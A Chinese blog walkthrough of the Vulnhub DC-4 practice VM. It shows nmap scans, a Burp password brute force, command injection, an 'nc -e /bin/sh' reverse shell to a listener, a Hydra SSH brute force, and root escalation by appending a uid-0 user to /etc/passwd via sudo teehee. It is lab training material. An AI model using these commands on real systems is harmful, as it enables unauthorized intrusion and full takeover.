Vulnhub靶机:DC-4渗透详细过程

 靶机下载地址放在文章最后啦

一、靶机的搭建  

1.打开文件夹右击使用VM虚拟机打开

2.给虚拟机取个名字(我这里就直接DC-3),选择自己虚拟机存放的位置

3.等待虚拟机的导入

4.直接打开虚拟机

二、渗透过程  

1.使用nmap扫一下存活的IP地址

我这里IP地址有点多,14这台机子应该就是DC-3靶机IP了

nmap -sn 10.189.160.10-20

2.使用nmap扫一下开放的端口

nmap -A -sV -p- 10.189.160.14

3.发现开放了 80和22端口,先访问80端口看看    

4.使用whatweb探测一下网站的指纹信息

whatweb -v http://10.189.160.14/

5.直接使用burb爆破账号和密码

发送到intruder    

把password设置成变量

导入字典进直接进行爆破

看数据返回的长度 最后得到密码为 happy

6.登陆进来点击Command发现可以执行命令

7.使用burp 对run抓包 修改包内容达到执行命令的效果

使用whoami看一下执行命令的权限    

8.使用nc来反弹shell

在本机终端打开监听

nc -lvp 7788

添加命令反弹shell到监听机上

nc -e /bin/sh 10.180.0.3:7788 这里要使用+进行拼接

nc+-e+/bin/sh+10.180.0.3+7788   

已经成功拿到shell了

9.使用python进去交互式界面

python -c "import pty;pty.spawn('/bin/bash')"

10.在home目录下发现有三个用户 jim里面发现了东西    

把密码复制出来在kali上面新建一个pass.txt的字典

11.使用 hydra 爆破前面扫到的22端口 ssh服务

hydra -l jim -P passwd.txt 10.189.160.14 ssh

12.使用jim登陆ssh服务

ssh jim@10.189.160.14    

查看mbox是一封邮件

13.进入Linux的邮箱目录打开jim发现了charles 的密码

    14.切换用户到charles 发现一个teehee用户可以使用root无密码权限

14.查看root权限格式

root:x:0:0:root:/root:/bin/bash字段1:用户名。字段2:密码占位符,x代表有密码。字段3:用户的uid,如果一个用户uid为0则表示该用户超级管理员。字段4:用户的gid,也就是所属用户组的id。字段5:用户信息(弃用)。字段6:用户家目录。字段7:用户登陆系统后使用的shell。

15.我们以仿照root权限创建一个用户写到/etc/passwd文件里去

无密码版

echo "hack::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

再次打开/etc/passwd就能看见我们创建的了

直接切换hack用户 已成功提权到root了

有密码版    

先使用下面命令生成密码

perl -le 'print crypt("123456", "aa")'
密  码:123456加密后:aaAN1ZUwjW7to

添加密码到命令里面并执行

echo "hack2:aaAN1ZUwjW7to:0:0:::/bin/bash" | sudo teehee -a /etc/passwd

16.进入root目录最后拿到flag了

    

记得点赞+关注,关注微信公众号菜鸟学渗透,有任何问题可以后台私信我

后台回复"DC-4"即可获得靶场地址

有考取NISP一级/二级/三级、CISP-PTE/PTS等证书的可以加我好友私信我(公众号回复“加好友”)。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

菜鸟学渗透

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值